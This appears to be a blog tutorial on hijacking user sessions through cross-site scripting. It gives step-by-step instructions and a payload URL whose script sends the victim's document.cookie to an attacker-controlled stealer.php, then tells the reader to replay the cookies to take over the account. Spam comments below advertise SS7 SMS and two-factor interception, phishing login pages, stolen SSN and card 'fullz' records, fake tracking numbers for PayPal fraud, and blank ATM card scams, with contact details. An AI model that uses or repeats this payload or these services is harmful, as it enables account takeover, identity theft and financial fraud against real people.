Session Hijacking using XSS
Session hijacking can be defined as impersonating and sending a request as a user other than yourself.
In layman's language, it is similar to plane hijacking, where a terrorist takes control of the plane except that here the hacker takes control of the session. It can be done in many ways, the most common being stealing the cookies of a user.
Procedure
1) Find the website which is vulnerable to XSS. Let us assume that a site abc.com is vulnerable to XSS.
2) Assume that when a search (which is vulnerable to XSS) is performed on the website, parameters are passed in the url in the format http://abc.com/?s=hello
3) Now we need to save the cookies of the user.
4) Copy the code from my repository at https://github.com/rohankalra97/Session-Hijacking/blob/master/stealer.php and save it as stealer.php
5) Replace the 5th line with the url which you want the user to be finally redirected to.
6) Create an empty file with name log.txt.
7) Now push the file at your own server. Let us assume that the server at which you pushed is at xyz.com.
8) Now to steal the cookies, we need to edit the search url and add following script at it <script>location.href = 'http://xyz.com/stealer.php?cookie='+document.cookie;</script>
9)Now we need to send the url to the user where the script is added at abc.com
http://abc.com/?s=<script>location.href = 'http://xyz.com/stealer.php?cookie='+document.cookie;</script>
10) On opening the url, the user will be redirected to xyz.com and cookies will be stored in log.txt and the user will again be redirected to the url which you wrote in step 5.
11) On saving those cookies to your browser, you will get access to that user's account.
Always remember to use Kali for helpful purposes and not use it to cause harm.
Stay Safe.
Stay Safe.
Follow us on Facebook:- Facebook.com/VAPTHacker
LinkedIn:- https://www.linkedin.com/in/rohankalra97/
Twitter:- https://twitter.com/rohankalra97
SS7 software available to limited number of users
ReplyDeleteSMS interception only software $100
SMS /call Voice recording $350
2Factor Authentication /location tracking $500
Read and intercept SMS /phone calls / 2 factor authentications etc
Check another person whatsapp messages
do you have a cheating partner? let me know
PS: this software is not be used for criminal activites
we will not be responsible for any charges you face for involving in illegal activities.
NO trial version, For educational purposes and for serious buyers only , do not respond to email if you have no intention to purchase
Eail: fenzy67@gmail.com
https://bloggerkingindia.blogspot.com/2017/03/hacking-whatsapp-with-ss7-flaw-signal.html
I can create a fake facebook login page
fake linkedin login page
fake coinbase login page
fake blockchain login page
fake online banking login page
fake gmail/yahoo mail and other mail login page
learn how to use Unsubscribe options to obtain email and password
Using hhp+html codes.... my delivery time =4hours
informations will be delivered to you preffered email addresses
serious enquiries only
Strickly for educational purposes
Eail: fenzy67@gmail.com
Hey Guys !
DeleteUSA Fresh & Verified SSN Leads with DL Number AVAILABLE with 99.9% connectivity
All Leads have genuine & valid information
**HEADERS IN LEADS**
First Name | Last Name | SSN | Dob | DL Number | Address | City | State | Zip | Phone Number | Account Number | Bank Name | Employee Details | IP Address
*Price for SSN lead $2
*You can ask for sample before any deal
*If anyone buy in bulk, we can negotiate
*Sampling is just for serious buyers
==>ACTIVE, FRESH CC & CVV FULLZ AVAILABLE<==
->$5 PER EACH
->Hope for the long term deal
->Interested buyers will be welcome
**Contact 24/7**
Whatsapp > +923172721122
Email > leads.sellers1212@gmail.com
Telegram > @leadsupplier
ICQ > 752822040
ReplyDeleteI provide 100% tracking numbers for different countries , including weight, shipping TO and FROM, specifics of package and all major companies, USPS, FedEx, UPS, DHL,
It recommended for lifting paypal money on hold
Mobile: +1 (914) 278-7320
Mail: psoon043@gmail.com
Telegram: https://t.me/Hackord247
Hi everyone, I saw comments from people who had already got Blank ATM Cards from Mike Fisher. Honestly I thought it was a scam, and then I decided to make a request based on their recommendations. A few days ago, I confirmed in my door step to have received my blank card to withdraw 12,000 euros, which I requested for business. This is really good news and I am so happy that I advise all those who need a real HACKER should contact him and who are sure to reimburse to apply through their email (text or call) +1 315-329-6320 There are sincere Hackers
ReplyDeleteThey are able to Delivered your Blank ATM Cards
Contact Mr Mike
E-mail: blankatm002@gmail.com
Telephone: +1(301) 329-5298
Hey Guys !
ReplyDeleteUSA Fresh & Verified SSN Leads with DL Number AVAILABLE with 99.9% connectivity
All Leads have genuine & valid information
**HEADERS IN LEADS**
First Name | Last Name | SSN | Dob | DL Number | Address | City | State | Zip | Phone Number | Account Number | Bank Name | Employee Details | IP Address
*Price for SSN lead $2
*You can ask for sample before any deal
*If anyone buy in bulk, we can negotiate
*Sampling is just for serious buyers
==>ACTIVE, FRESH CC & CVV FULLZ AVAILABLE<==
->$5 PER EACH
->Hope for the long term deal
->Interested buyers will be welcome
**Contact 24/7**
Whatsapp > +923172721122
Email > leads.sellers1212@gmail.com
Telegram > @leadsupplier
ICQ > 752822040
I provide 100% working numbers for Whatsapp registration,
ReplyDeleteValid Passport/ID , Online banking login accounts, for all countries.
Mobile: +1 (914) 278-7320
Mail: psoon043@gmail.com
Telegram: https://t.me/psoon